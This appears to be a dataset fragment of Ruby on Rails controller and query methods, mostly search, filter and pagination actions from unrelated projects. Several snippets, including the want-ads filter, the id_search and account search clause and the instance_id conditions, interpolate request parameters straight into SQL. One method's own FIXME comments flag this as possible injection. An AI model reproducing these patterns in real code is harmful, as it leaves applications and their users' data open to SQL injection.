"def index\n @retail_buyer_profile = @profile if (params[:from] && params[:from] == \"buyer_leads\" )\n @page_number = (params[:page_number] || \"1\").to_i\n @result_filter = (params[:result_filter] || \"all\")\n default_sort_type = @profile.owner? ? \"has_profile_image,desc\" : \"privacy,desc\"\n @sort = (params[:sort] || default_sort_type)\n @sort_type = @sort.split(',')[0]\n @sort_order = @sort.split(',')[1]\n @sort_string = \"#{@sort_type} #{@sort_order}\"\n @offset = @page_number == 1 ? nil : (@page_number-1) * PROFILES_PER_PAGE\n @listing_type = params[:listing_type] || \"all\"\n @listing_type = \"all\" if @listing_type.empty?\n\n # Fetch results, with custom pagination support\n @profiles,@total_profiles_fetched,@total_pages = MatchingEngine.get_matches(:profile=>@profile, :offset=>@offset, :result_filter=>@result_filter, :number_to_fetch=> PROFILES_PER_PAGE, :sort=>@sort_string, :listing_type=>@listing_type, :use_cache => true)\n\n unless (@profile.is_wholesale_profile? or @profile.is_wholesale_owner_finance_profile?)\n offset,number_to_fetch = Profile.get_limit_and_offset(@total_profiles_fetched,@page_number,PROFILES_PER_PAGE)\n #Near Match\n if @result_filter=='all' || @result_filter=='new'\n @near_profiles,@near_total_profiles,@near_total_pages = MatchingEngine.get_matches(:profile=>@profile, :offset=>offset, :result_filter=>@result_filter, :number_to_fetch=> number_to_fetch, :sort=>@sort_string, :listing_type=>@listing_type, :use_cache => true, :near_match => true)\n else\n @near_profiles,@near_total_profiles,@near_total_pages = NearMatchingEngine.get_near_matches(:profile=>@profile, :offset=>offset, :result_filter=>@result_filter, :number_to_fetch=> number_to_fetch, :sort=>@sort_string, :listing_type=>@listing_type)\n end\n else\n @near_profiles,@near_total_profiles,@near_total_pages = [], 0, 0\n end\n\n if @result_filter=='all' || @result_filter=='new' || @result_filter=='favorites'\n @total_pages = ( (@total_profiles_fetched.to_i + @near_total_profiles.to_i) / PROFILES_PER_PAGE.to_i)\n @total_pages += 1 if ((@total_profiles_fetched.to_i + @near_total_profiles.to_i) % PROFILES_PER_PAGE.to_i) != 0\n @total_pages = 1 if @total_pages == 0\n end\n # Prime the profile models for their display purpose\n @profiles.each { |profile| profile.prepare_for_match_display(@profile, profile_profile_view_path(@profile, profile))}\n\n # prepare the map\n @map = ZipCodeMap.prepare_map(@profiles.first.zip_code.to_s) unless @profiles.first == nil\n @map = ZipCodeMap.prepare_map(@profile.zip_code.to_s) if @profiles.first == nil\n\n @boundary_overlays = ZipCodeMap.prepare_boundary_overlays(@profile.zip_code.to_s)\n\n @marker_overlays = ZipCodeMap.prepare_marker_overlays(@profiles, :context_profile=>@profile, :return_params=>encode_return_dashboard_variables) unless @profiles.first == nil\n @marker_overlays = [] if @profiles.first == nil\n\n respond_to do |format|\n format.html do\n # if we need some special javascript to update the buyer map, change this call to render a different partial\n # with this call embeded within\n render :partial=>\"#{@profile.profile_type.permalink_to_generic_page}_matches\" and return if request.xhr?\n end\n format.xml { render :xml => @profiles.to_xml }\n format.json { render :json => @profiles.to_json(:only=>[:id], :methods =>[:display_name, :display_type, :display_description, :display_features, :display_price, :display_is_favorite, :display_details_uri]) }\n end\n end",
"def getResults (allEntryIds, page, resultsPerPage)\n pubLib = Array.new\n @startIndex = (page-1)*resultsPerPage\n @endIndex = @allEntries.size() <= ((page-1)*resultsPerPage)+resultsPerPage ? @allEntries.size() : ((page-1)*resultsPerPage)+resultsPerPage\n #puts \"#{@startIndex} to #{@endIndex}\"\n medline = esummary(allEntryIds.values_at(@startIndex ... @endIndex).join(','))\n d = Hpricot.XML(medline) \n pubmedRank = @startIndex+1\n (d/:DocSum).each do |a|\n entry = Hash.new\n entry[:pubmedRank] = pubmedRank\n entry[:id] = a.at('Id').inner_html\n entry[:Date] = a.at(\"Item[@Name='PubDate']\").inner_html\n autoren = Array.new\n a.at(\"Item[@Name='AuthorList']\").search('Item') do |author|\n if(!author.nil?)\n autoren.push \"#{author.inner_html}\"\n end\n end\n #autoren += a.at(\"Item[@Name='LastAuthor']\").inner_html creates duplicate of LastAuthor, bad!\n entry[:Authors] = autoren\n entry[:Title] = a.at(\"Item[@Name='Title']\").inner_html\n pmcid =\"none\" \n if(a.at(\"Item[@Name='ArticleIds']\").at(\"Item[@Name='pmc']\"))\n pmcid = a.at(\"Item[@Name='ArticleIds']\").at(\"Item[@Name='pmc']\").inner_html\n end\n entry[:PMCid] = pmcid\n pubLib << entry\n pubmedRank += 1\n end \n pubLib\n end",
"def index\n #if params[:search]\n # @links = current_user.links.limit(500).group(:short_url).paginate :page => params[:page], :per_page => 20, :order => 'post_date DESC'\n #else\n @links = current_user.links.search(params[:search]).paginate :page => params[:page], :per_page => 20\n #end\n \n=begin\n #delete duplicates almost there TODO\n dups = current_user.links.group(:short_url).count\n\n @links.each_with_index do |link, i|\n link.count = dups[link.short_url]\n if dups[link.short_url] > 1\n @links.delete_if do |v| \n v.short_url == link.short_url\n puts v.short_url\n puts \"=====hit=====\"\n end\n end\n end\n=end\n \n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @links }\n end\n end",
"def find(model)\n\n # Find out how many are in each bucket\n # FIXME: This may be databse specific. Works on MySQL and SQLite\n # FIXME: field should be sanatized. Possible SQL Injection attack\n @counts = model.count :all,\n :group => \"SUBSTR(LOWER(#{field.to_s}), 1, 1)\"\n @counts = @counts.inject(HashWithIndifferentAccess.new()) do |m,grp|\n grp[0] = grp[0].blank? ? 'Blank' : grp[0]\n m[grp[0]] = m[grp[0].upcase] = grp[1]\n m\n end\n @counts['All'] = total if @options[:all]\n\n # Reset to default group if group has not records\n self.group = nil unless @counts.has_key? group\n\n # Find the first group that has records\n all_groups = ('A'..'Z').to_a + ['Blank']\n all_groups << 'All' if @options[:all]\n self.group = all_groups.detect(proc {'A'}) do |ltr|\n @counts.has_key? ltr\n end if group.blank?\n\n unless (min_records && total >= min_records) || group == 'All'\n # Determine conditions. '' or NULL shows up under \"Blank\"\n operator = if group == 'Blank'\n # FIXME: Field should be sanatized. Possible SQL Inject attack\n \"= '' OR #{field.to_s} IS NULL\"\n else\n 'LIKE ?'\n end\n # FIXME: Field should be sanatized. Possible SQL Inject attack\n conditions = [\n \"#{model.table_name}.#{field.to_s} #{operator}\",\n \"#{group}%\"\n ]\n end\n\n # Find results for this page\n model.with_scope({:find => {:conditions => conditions}}) {model.find :all}\n end",
"def index\n # binding.pry\n @shares = Share.all\n @q = Share.search(params[:q])\n @shares = @q.result(distinct: true)\n end",
"def show\n @websitepages = @website.pages\n @pages = @websitepages.where(:show_page_on_index => true)\n @times = @website.timetables \n @search = Inventory.where(:website_id => @website.id).ransack(params[:q]) \n @listings = @search.result.paginate(:per_page => 12, :page => params[:page]) \n @search.build_condition \n\n # @newlisting = Listing.new(\"https://fierce-sea-43472.herokuapp.com/categories.json\") \n # @listings = @newlisting.getresponse((User.find_by_id(@website.user_id).email).to_s)\n # if params[:sort].present? && params[:direction].present?\n \n # else\n # @listings = @search.result.paginate(:per_page => 12, :page => params[:page]) \n # end\n\n end",
"def query_without_filter_paging_sorting\n query = @initial_query.dup\n\n # restrict to select columns\n query_projection(query)\n end",
"def index\n @public_teams = Team.where(private: nil)\n #@companies_with_public_teams = Team.where(private: nil).group(:company_id)\n @companies_with_public_teams = Team.where(private: nil).select(\"DISTINCT ON (company_id) *\")\n end",
"def index\n\n#client = Google::APIClient.new\n\n@products = Product.paginate(:page => params[:page], :per_page => 30)\n@manufacturers = Product.uniq.pluck(:manufacturer)\n@categories = Product.uniq.pluck(:type_b)\n@sub_categories = Product.uniq.pluck(:sub_type)\n\nend",
"def index\n where = {}\n @url_params = {}\n @sort_by = nil\n @sort_dir = nil\n order_clause = nil\n if session[:tablen].nil?\n\tsession[:tablen] = 20\n end\n\n if not params[:sort_by].nil?\n\n if params[:sort_by] == \"count\"\n @sort_by = \"count\"\n end\n\n if params[:sort_by] == \"port\"\n @sort_by = \"port\"\n end\n\n if params[:sort_by] == \"transport_protocol\"\n @sort_by = \"transport_protocol\"\n end\n\n if not @sort_by.nil?\n if params[:sort_dir] == \"desc\"\n @sort_dir = \"desc\"\n else\n @sort_dir = \"asc\"\n end\n\n order_clause = \"#{@sort_by} #{@sort_dir}\"\n end\n else\n order_clause = \"count desc\"\n end\n\n if not params[:trans_v].nil?\n where[:transport_protocol] = params[:trans_v]\n @url_params[:trans_v] = params[:trans_v]\n end\n\n if session[:test_area].nil?\n @record_count = PortSummary.find(:all, :conditions => where).length\n @pager = Paginator.new(@record_count, session[:tablen]) do |offset, per_page|\n # PortSummary.find(:all, :order => order_clause, :limit => per_page, :offset => offset, :conditions => where)\n PortSummary.find(:all, :select => [\"sum(count) as count, port, transport_protocol\"], :order => order_clause, :limit => per_page, :offset => offset, :conditions => where, :group => \"port, transport_protocol\")\n # TODO order by something\n end\n else\n @record_count = PortSummary.find_all_by_test_area_id(session[:test_area], :conditions => where).length\n @pager = Paginator.new(@record_count, session[:tablen]) do |offset, per_page|\n PortSummary.find_all_by_test_area_id(session[:test_area], :order => order_clause, :limit => per_page, :offset => offset, :conditions => where)\n # TODO order by something\n end\n end\n\n @port_summarys = @pager.page(params[:page])\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @port_summarys }\n end\n end",
"def results; end",
"def results; end",
"def results; end",
"def source_results(race)\n if race.discipline == 'Road'\n race_disciplines = \"'Road', 'Circuit'\"\n else\n race_disciplines = \"'#{race.discipline}'\"\n end\n \n # Cat 4/5 is a special case. Can't config in database because it's a circular relationship.\n category_ids = category_ids_for(race)\n category_4_5_men = Category.find_by_name(\"Category 4/5 Men\")\n category_4_men = Category.find_by_name(\"Category 4 Men\")\n if category_4_5_men && category_4_men && race.category == category_4_men\n category_ids << \", #{category_4_5_men.id}\"\n end\n\n Result.find(:all,\n :include => [:race, {:person => :team}, :team, {:race => [{:event => { :parent => :parent }}, :category]}],\n :conditions => [%Q{\n place between 1 AND #{point_schedule.size - 1}\n and (events.type in ('Event', 'SingleDayEvent', 'MultiDayEvent', 'Series', 'WeeklySeries', 'TaborOverall') or events.type is NULL)\n and bar = true\n and events.sanctioned_by = \"#{ASSOCIATION.default_sanctioned_by}\"\n and categories.id in (#{category_ids})\n and (events.discipline in (#{race_disciplines})\n or (events.discipline is null and parents_events.discipline in (#{race_disciplines}))\n or (events.discipline is null and parents_events.discipline is null and parents_events_2.discipline in (#{race_disciplines})))\n and (races.bar_points > 0\n or (races.bar_points is null and events.bar_points > 0)\n or (races.bar_points is null and events.bar_points is null and parents_events.bar_points > 0)\n or (races.bar_points is null and events.bar_points is null and parents_events.bar_points is null and parents_events_2.bar_points > 0))\n and events.date between '#{date.year}-01-01' and '#{date.year}-12-31'\n }],\n :order => 'person_id'\n )\n end",
"def search\n @sorting = 'DESC'\n\n if (params[:sortBtn] == 'ASC')\n @sorting = 'ASC'\n else\n @sorting = 'DESC'\n end\n \n @qualities_search = Quality.order(\"strftime('%Y',date) \" + @sorting + \", julian_date DESC, lot DESC, time DESC\").search :lot_or_user_first_name_or_user_last_name_contains => params[:term]\n @users_search = User.order(\"last_name ASC\").search :first_name_or_last_name_or_email_contains => params[:term]\n \n if current_user.facility_id == 3\n @qualities = @qualities_search.where('facility_origin_id = ?','3').order(\"strftime('%Y',date) \" + @sorting + \", julian_date DESC, lot DESC, time DESC\").page params[:qualities_page]\n @users = @users_search.where('facility_id = ?','3').order(\"last_name ASC\").page params[:users_page]\n elsif current_user.facility_id == 2\n @qualities = @qualities_search.where('facility_origin_id = ?','2').order(\"strftime('%Y',date) \" + @sorting + \", julian_date DESC, lot DESC, time DESC\").page params[:qualities_page]\n @users = @users_search.where('facility_id = ?','2').order(\"last_name ASC\").page params[:users_page]\n else\n @qualities = @qualities_search.order(\"strftime('%Y',date) \" + @sorting + \", julian_date DESC, lot DESC, time DESC\").page params[:qualities_page]\n @users = @users_search.order(\"last_name ASC\").page params[:users_page]\n end\n\n respond_to do |format|\n format.html\n format.js\n format.xlsx {\n if !current_user.administrator? and current_user.technician?\n flash[:alert] = 'You do not have the necessary permissions to download this data.'\n redirect_to '/'\n else\n if(params[:searchType] == 'qualities')\n @qualities_search = Quality.order(\"strftime('%Y',date) DESC, julian_date DESC, lot DESC, time DESC\").search :lot_or_user_first_name_or_user_last_name_contains => params[:term]\n if current_user.facility_id == 3\n send_data @qualities_search.where('facility_id = ?','3').order(\"strftime('%Y',date) DESC, julian_date DESC, lot DESC, time DESC\").to_xlsx.to_stream.read, :filename => 'search.xlsx', :type => \"application/vnd.openxmlformates-officedocument.spreadsheetml.sheet\" \n elsif current_user.facility_id == 2\n send_data @qualities_search.where('facility_id = ?','2').order(\"strftime('%Y',date) DESC, julian_date DESC, lot DESC, time DESC\").to_xlsx.to_stream.read, :filename => 'search.xlsx', :type => \"application/vnd.openxmlformates-officedocument.spreadsheetml.sheet\" \n else\n send_data @qualities_search.order(\"strftime('%Y',date) DESC, julian_date DESC, lot DESC, time DESC\").to_xlsx.to_stream.read, :filename => 'search.xlsx', :type => \"application/vnd.openxmlformates-officedocument.spreadsheetml.sheet\" \n end \n elsif(params[:passed] == \"users\")\n #do nothing\n else\n #do nothing\n end\n end\n }\n end\n end",
"def filter\n page = params[:page] || 1\n\n want_ads = WantAd.active.joins(:user)\n .joins(\"LEFT OUTER JOIN addresses a ON a.addressable_id = want_ads.id and a.addressable_type = 'WantAd'\")\n .joins(\"LEFT OUTER JOIN cities ON cities.id = a.city_id\")\n .select('users.name as user_name, cities.name as city_name, want_ads.*')\n\n want_ads = want_ads.where(category_id: params[:category_id]) if params[:category_id].present?\n want_ads = want_ads.where(\"cities.id = #{params[:city_id]}\") if params[:city_id].present?\n want_ads = want_ads.where(\"price >= #{params[:min_price]}\") if params[:min_price].present?\n want_ads = want_ads.where(\"price <= #{params[:max_price]}\") if params[:max_price].present?\n want_ads = want_ads.where(\"deadline <= '#{params[:date]}'\") if params[:date].present?\n want_ads = want_ads.where(\"title ILIKE '%#{params[:search]}%' OR description ILIKE '%#{params[:search]}%'\") if params[:search].present?\n\n want_ads = want_ads.order(\"#{params[:sort_by]}\") if params[:sort_by].present?\n want_ads = want_ads.page(page)\n\n want_ads.map do |want_ad|\n {\n id: want_ad.id,\n title: want_ad.title,\n description: want_ad.description,\n deadline: want_ad.deadline,\n owner_name: want_ad.user_name,\n city_name: want_ad.city_name,\n price: want_ad.price\n }\n end\n\n render json: {\n want_ads: want_ads,\n number_pages: want_ads.total_pages,\n current_page: page\n }\n end",
"def index\n # convert the sorting title to the corresponding database column name\n column_name = Title_To_Column_Name[params[:sort]]\n # default to order by event timestamp\n column_name = \"timestamp\" if column_name.nil?\n # determine the order by clause\n order_by = column_name + \" \" + sort_direction\n \n # determine the search clause based on the search param\n if (params[:id_search] && !params[:id_search].empty?)\n #TODO sanitize the search param since we are now using direct sql.\n search_clause = \"p.id like '#{params[:id_search]}' or s.name like '#{params[:id_search]}'\" \n sql = SQL.gsub(\"search_clause\", search_clause)\n sql = sql.gsub(\"order_by\", order_by) \n else\n names = \n case params[:activity_search]\n when 'submitted'\n \"('submit')\"\n when 'rejected'\n \"('reject','daitss v.1 reject')\" \n when 'archived'\n \"('ingest finished')\"\n when 'disseminated'\n \"('disseminate finished')\"\n when 'error'\n \"('ingest snafu', 'disseminate snafu', 'refresh snafus')\"\n when 'withdrawn'\n \"('withdraw finished')\"\n else\n \"('submit', 'reject', 'ingest finished', 'disseminate finished', 'ingest snafu', 'disseminate snafu', 'withdraw finished', 'daitss v.1 provenance')\"\n end\n # filter on date range\n @start_date = if params[:start_time_search] and !params[:start_time_search].strip.empty?\n DateTime.strptime(params[:start_time_search], \"%Y-%m-%d\")\n else\n Time.at 0\n end\n\n @end_date = if params[:end_time_search] and !params[:end_time_search].strip.empty?\n DateTime.strptime(params[:end_time_search], \"%Y-%m-%d\")\n else\n DateTime.now\n end\n\n @end_date += 1\n # lookup account if passed in\n if (params[:account] && params[:account][\"account_id\"] && !params[:account][\"account_id\"].empty?)\n account = params[:account][\"account_id\"]\n end\n \n # lookup project if passed in\n if (params[:project] && params[:project] [\"project_id\"] && !params[:project][\"project_id\"].empty?)\n # account and project specified\n project = params[:project][\"project_id\"] if account\n end\n \n if account\n if project\n # account and project specified\n search_clause = \"pj.account_id = '#{account}' and pj.id = '#{project}' and \"\n else\n # account but not project specified\n search_clause = \"pj.account_id = '#{account}' and \"\n end\n else \n # neither account nor project specified\n search_clause = \"\" \n end\n search_clause += \"e.timestamp between '#{@start_date}' and '#{@end_date}' and e.name in #{names}\" \n sql = SQL.gsub(\"search_clause\", search_clause)\n sql = sql.gsub(\"order_by\", order_by) \n end\n @results = DataMapper.repository(:default).adapter.select(sql).paginate(page: params[:page])\n end",
"def index\n begin\n\n conditions = \"(parent_id=#{params[:instance_id]} or child_id=#{params[:instance_id]})\"\n params[:conditions] = add_condition(params[:conditions], conditions, :and) \n \n @parcel = get_paginated_records_for(\n :for => Link,\n :start_index => params[:start_index],\n :max_results => params[:max_results],\n :order_by => params[:order_by],\n :direction => params[:direction],\n :conditions => params[:conditions]\n )\n render :response => :GETALL\n rescue Exception => e\n @error = process_exception(e)\n render :response => :error\n end\n \n\n end",
"def batch_query\n render nothing: true\n\n # logger.info \"params: \" + params.inspect\n #\n # endpoints_all = Endpoint.all\n # logger.info \"List of all endpoints:\"\n # endpoints_all.each do |endpoint|\n # logger.info ' name: ' + endpoint[:name] + ', url: ' + endpoint[:base_url]\n # end\n\n # Select endpoints using array of endpoint names;\n # Unfortunately, they are not necessarily unique\n endpoint_names = params[:endpoint_names]\n logger.info 'param endpoint_names:' + endpoint_names.inspect\n selected_endpoints = []\n if endpoint_names\n parse_array(endpoint_names).each do |endpoint_name|\n match_ep = Endpoint.find_by_name(endpoint_name)\n if match_ep\n logger.info endpoint_name.to_s + ' matches: ' + match_ep[:name].inspect\n selected_endpoints.push(match_ep)\n else\n logger.info 'WARNING: ' + endpoint_name.to_s + ' has no match!'\n end\n end\n end\n # logger.info 'selected endpoings: ' + selected_endpoints.inspect\n\n\n # users = User.all\n # users.each do |user|\n # logger.info 'username: ' + user[:username]\n # end\n\n # queries_all = Query.all\n # logger.info \"List of all queries:\"\n # queries_all.each do |query|\n # logger.info ' title: ' + query[:title] + ', desc: ' + query[:description]\n # end\n\n # Select query using array of query descriptions;\n # Unfortunately, they are not necessarily unique\n #query_titles = params[:query_titles]\n username = params[:username]\n current_user = User.find_by_username(username)\n if current_user\n query_descriptions = params[:query_descriptions]\n # logger.info 'param query_descriptions:' + query_descriptions.inspect\n selected_queries = []\n if query_descriptions\n parse_array(query_descriptions).each do |query_desc|\n match_query = current_user.queries.find_by_description(query_desc)\n if match_query\n logger.info query_desc + ' matches: ' + match_query[:description].inspect\n selected_queries.push(match_query)\n else\n logger.info 'WARNING: ' + query_desc + ' has no match!'\n end\n end\n end\n end\n # logger.info 'selected queries: ' + selected_queries.inspect\n\n if selected_endpoints && !selected_endpoints.empty? &&\n selected_queries && !selected_queries.empty?\n notify = params[:notification]\n selected_queries.each do |eachQuery|\n #Parallel.each(selected_queries, :in_threads=>15) do |eachQuery|\n # execute the query, and pass in the endpoints and if the user should be notified by email when execution completes\n # logger.info 'title: ' + eachQuery[:title].inspect\n # logger.info 'desc: ' + eachQuery[:description].inspect\n # logger.info 'user_id: ' + eachQuery[:user_id].inspect\n eachQuery.execute(selected_endpoints, notify)\n end\n else\n flash[:alert] = 'Cannot execute a query if no endpoints are provided.'\n end\n end",
"def distinct\n with_opts(:distinct=>true)\n end",
"def index\n #@songs = Song.all\n authorize Song\n @q = Song.search(params[:q])\n @songs = @q.result(distinct: true)\n @songs = @songs.order(\"#{sort_column} #{sort_direction}\")\n end",
"def index\n @results = {}\n\n if TeSS::Config.solr_enabled\n SEARCH_MODELS.each do |model_name|\n model = model_name.constantize\n @results[model_name.underscore.pluralize.to_sym] = Sunspot.search(model) do\n fulltext search_params\n\n with('end').greater_than(Time.zone.now) if model_name == 'Event'\n\n\n # Hide failing records\n if model.method_defined?(:link_monitor)\n unless current_user && current_user.is_admin?\n without(:failing, true)\n end\n end\n\n if model.attribute_method?(:user_requires_approval?)\n # TODO: Fix this duplication!\n # Hide shadowbanned users' events, except from other shadowbanned users and administrators\n unless current_user && (current_user.shadowbanned? || current_user.is_admin?)\n without(:shadowbanned, true)\n end\n\n # Hide unverified users' things, except from curators and admins\n unless current_user && (current_user.is_curator? || current_user.is_admin?)\n without(:unverified, true)\n end\n end\n end\n end\n \n end\n\n @results.reject! { |_, result| result.total < 1 }\n end",
"def index\n @task_links = TaskLink.all\n if params[:task_id]\n task = Task.viewable_tasks(current_user).find(params[:task_id])\n @task_links = @task_links.where(id: [] + task.from_link_ids + task.to_link_ids)\n else\n @task_links = @task_links.where(from_task_id: params[:from_task_id]) if params[:from_task_id]\n @task_links = @task_links.where(to_task_id: params[:to_task_id]) if params[:to_task_id]\n end\n #Filter out duplicate....\n @task_links = @task_links.where(\"from_task_id < to_task_id or link_type <> 'duplicate'\")\n\n #Apply security constraints\n #@task_links = Kaminari.paginate_array(@task_links.select { |task_link|\n #true\n #})\n\n @task_links = page(@task_links)\n end",
"def index\n #@results = Result.all\n @run = Run.find(params[:run_id]) if params[:run_id] && params[:run_id].to_i > 0\n @runs = Run.find(:all, :order => \"eventday desc\", :conditions => {:showresults => true})\n #@results = Result.all\n @categories = Result.find_by_sql(\"select run_id, cat from results group by run_id, cat;\")\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @results }\n end\n end",
"def source_results(race)\n category_ids = category_ids_for(race).join(\", \")\n\n Result.all(\n :include => [:race, {:person => :team}, :team, {:race => [{:event => { :parent => :parent }}, :category]}],\n :conditions => [%Q{\n (events.type in ('Event', 'SingleDayEvent', 'MultiDayEvent') or events.type is NULL)\n and bar = true\n and categories.id in (#{category_ids})\n and (events.discipline = '#{race.discipline}'\n or (events.discipline is null and parents_events.discipline = '#{race.discipline}')\n or (events.discipline is null and parents_events.discipline is null and parents_events_2.discipline = '#{race.discipline}'))\n and (races.bar_points > 0\n or (races.bar_points is null and events.bar_points > 0)\n or (races.bar_points is null and events.bar_points is null and parents_events.bar_points > 0)\n or (races.bar_points is null and events.bar_points is null and parents_events.bar_points is null and parents_events_2.bar_points > 0))\n and events.date between '#{date.year}-01-01' and '#{date.year}-12-31'\n }],\n :order => 'person_id'\n )\n end",
"def index\n @search = PurchaseRequisition.search(params[:search])\n @purchase_requisitions = @search.order('pr_date DESC , created_at DESC').all.uniq.paginate(:page => params[:page], :per_page => 20)\n \n end",
"def index\n #@parameters = Parameter.all\n @q = Parameter.search(params[:q])\n @parameters = @q.result(:distinct => true).order(sort_column + ' ' + sort_direction).paginate( :page => params[:page])\n @q.build_condition\n \n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @parameters }\n end\n end",
"def index\n @q = Item.search(params[:q])\n @items = @q.result(distinct: true)\n end",
"def indexSuites\n @q = Vendor.where(entry:'Suit').ransack(params[:q])\n\n @per_page = params[:per_page] || Vendor.per_page || 20\n @vendors = @q.result(:distinct=>true).paginate( :per_page => @per_page, :page => params[:page])\n if @vendors.size.zero?\n flash[:notice] = \"No Matches Found\"\n end\n end",
"def index\n\n sort_columns = {\n 'default' => 'latest_github_activity_at',\n 'github-joined' => 'github_created_at',\n 'github-followers' => 'followers'\n }\n\n params[:sort_order] = params[:sort_order] || 'desc'\n\n if params[:sort_by].present?\n order_by_string = \"#{sort_columns[params[:sort_by]]} #{params[:sort_order].upcase}\"\n else\n order_by_string = \"#{sort_columns['default']} #{params[:sort_order].upcase}\"\n end\n\n if params[:language].present?\n\n language = Language.find_by(slug: params[:language])\n @profiles = language.profiles.includes([:code_wars_datum, :languages]).reorder(order_by_string).paginate(:page => (params[:page] || 1), :per_page => 100)\n\n elsif params[:username].present?\n\n @profiles = Profile.includes([:code_wars_datum, :languages]).search(params[:username]).reorder(order_by_string).paginate(:page => (params[:page] || 1), :per_page => 100)\n\n else\n\n @profiles = Profile.includes([:code_wars_datum, :languages]).reorder(order_by_string).paginate(:page => (params[:page] || 1), :per_page => 100)\n\n end\n\n end",
"def result\n query_group.with_context do\n if primary.summarise?\n summary_result\n else\n simple_result\n end\n end\n end",
"def paged_results\n results = WillPaginate::Collection.create( @index.current_page, @index.docs_per_page, @index.current_results_total ) do |pager|\n pager.replace(@index.ordered_results)\n end\n return results\n end",
"def load_records\n get_paging_parameters\n @filter, @subfilter, find_include, find_conditions, @total_records = filter_prepare\n find_order = @sortable_columns.has_key?(@sidx) ? (@sortable_columns[@sidx] + ' ' + ((@sord == 'desc') ? 'DESC' : 'ASC')) :\n (@default_sidx ? @sortable_columns[@default_sidx] + ' ASC' : nil)\n # find_order = @sortable_columns.include?(@sidx) ? (@sidx + ' ' + ((@sord == 'desc') ? 'DESC' : 'ASC')) :\n # (@default_sidx ? @default_sidx + ' ASC' : nil)\n rows_per_page = @rows_per_page\n if rows_per_page > 0\n @total_pages = (@total_records > 0 && rows_per_page > 0) ? 1 + (@total_records/rows_per_page).ceil : 0\n @page = @total_pages if @page > @total_pages\n @page = 1 if @page < 1\n @start_offset = rows_per_page*@page - rows_per_page\n else\n @total_pages = 1\n rows_per_page = @total_records\n @start_offset = 0\n end\n if @start_offset < 0\n puts \"??Why is start_offset negative?\"\n @start_offset = 0\n end\n if @livesearch && @livesearch.size > 0\n livesearch_fields = @livesearch_fields[@livesearch_field] rescue []\n if livesearch_fields.size > 0\n fields_conditions = []\n @livesearch.split(' ').each do |substring|\n live_conditions = [] \n livesearch_fields.each do |f|\n find_conditions << \"%#{substring}%\"\n live_conditions << \"#{f} LIKE ?\" \n end\n fields_conditions << '(' + live_conditions.join(' or ') + ')'\n end\n find_conditions[0] += ' and (' + fields_conditions.join(' and ') + ')'\n end\n end\n puts \"Rows per page #{@rows_per_page}, offset #{@start_offset}, find_order #{find_order}, find_conditions #{find_conditions}, find_include #{find_include}.\"\n scoped_model.find(:all, :include => find_include, :conditions => find_conditions,\n :limit => rows_per_page, :offset => @start_offset, :order => find_order)\n end",
"def index\n @results = @search.result.paginate(page: params[:page], per_page: 9).order(created_at: :desc)\n end",
"def index\n #search query, check params for search then search by appropriate fields\n @q = Entry.all\n @author_id = params[:search][:author_id] if params[:search]\n @text = params[:search][:text] if params[:search]\n @q = Entry.search(@q, @text) if !@text.blank?\n @q = @q.where(author_id: params[:search][:author_id]) if !@author_id.blank?\n\n #final result and column toggle sort\n @entries = @q.paginate(:page => params[:page], :per_page => 30).includes(:author).order(sort_column + \" \" + sort_direction)\n end",
"def exercise2\n @content = ActiveRecord::Base.connection.execute(\"\n SELECT\n gr.name as group_name,\n u.name as user_name,\n sum(m.mapviews) as groups_count\n FROM (((users as u\n INNER JOIN groups_users as gu ON u.id=gu.user_id)\n INNER JOIN groups as gr ON gr.id = gu.group_id)\n INNER JOIN maps as m ON m.user_id = u.id)\n GROUP BY (gr.name, u.name)\n ORDER BY gr.name, groups_count DESC;\");\n\n @results2 = []\n\n index = 0\n @content.each do |r|\n @results2[index] = Result2.new r\n index = index + 1;\n end\n\n return @results2\n end",
"def index\n # no pagination for CSV export\n per_page = request.format.to_s.eql?('text/csv') ? 10000 : Person.per_page\n @results = if index_params[:q]\n Person.search index_params[:q], per_page: per_page, page: (index_params[:page] || 1)\n elsif index_params[:adv]\n Person.complex_search(index_params, per_page) # FIXME: more elegant solution for returning all records\n else\n []\n end\n @tags = index_params[:tags].blank? ? '[]' : Tag.where(name: index_params[:tags].split(',').map(&:strip)).to_json(methods: [:value, :label, :type])\n\n respond_to do |format|\n format.json { @results.map { |r| r['type'] = 'person' }.to_json }\n format.html {}\n format.csv do\n fields = Person.column_names\n fields.push('tags')\n output = CSV.generate do |csv|\n # Generate the headers\n csv << fields.map(&:titleize)\n\n # Some fields need a helper method\n human_devices = %w(primary_device_id secondary_device_id)\n human_connections = %w(primary_connection_id secondary_connection_id)\n\n # Write the results\n @results.each do |person|\n csv << fields.map do |f|\n field_value = person[f]\n if human_devices.include? f\n human_device_type_name(field_value)\n elsif human_connections.include? f\n human_connection_type_name(field_value)\n elsif f == 'tags'\n if person.tag_values.blank?\n ''\n else\n person.tag_values.join('|')\n end\n else\n field_value\n end\n end\n end\n end\n send_data output\n end\n end\n end",
"def get_select_on_records(mc, iter)\n if iter[0] == SELECT_ARTISTS\n if mc.view_compile?\n sql = %Q{SELECT DISTINCT(artists.rartist), artists.sname FROM artists\n INNER JOIN records ON records.rartist = artists.rartist }\n else\n sql = %Q{SELECT DISTINCT(artists.rartist), artists.sname FROM artists\n INNER JOIN segments ON segments.rartist = artists.rartist\n INNER JOIN records ON records.rrecord = segments.rrecord }\n end\n else\n sql = %Q{SELECT DISTINCT(records.stitle), artists.rartist, artists.sname, records.rrecord FROM records\n INNER JOIN artists ON records.rartist = artists.rartist }\n end\n end",
"def index\n @search = Project.search(params[:q])\n @projects = @search.result(:distinct => true).paginate(:page => params[:page], :per_page=>10).order(\"id DESC\")\n end",
